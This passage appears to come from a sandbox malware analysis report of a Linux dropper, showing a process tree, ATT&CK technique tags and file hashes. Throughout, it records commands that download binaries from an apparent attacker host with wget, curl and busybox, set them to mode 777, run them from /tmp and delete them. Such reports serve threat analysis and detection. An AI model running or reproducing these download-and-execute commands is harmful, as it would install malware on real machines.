- System Network Configuration Discovery
PID:940
-
-
/bin/chmodchmod 777 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo./GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:943
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:944
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- System Network Configuration Discovery
PID:947
-
-
/bin/chmodchmod 777 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r./TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:950
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:951
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- System Network Configuration Discovery
PID:954
-
-
/bin/chmodchmod 777 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh./BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:961
-
-
/bin/chmodchmod 777 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo./78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- System Network Configuration Discovery
PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:968
-
-
/bin/chmodchmod 777 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh./nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- System Network Configuration Discovery
PID:975
-
-
/bin/chmodchmod 777 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5./nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- System Network Configuration Discovery
PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- System Network Configuration Discovery
PID:982
-
-
/bin/chmodchmod 777 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq./JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- System Network Configuration Discovery
PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- System Network Configuration Discovery
PID:989
-
-
/bin/chmodchmod 777 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H./T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- System Network Configuration Discovery
PID:996
-
-
/bin/chmodchmod 777 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP./hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO./YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:1006
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97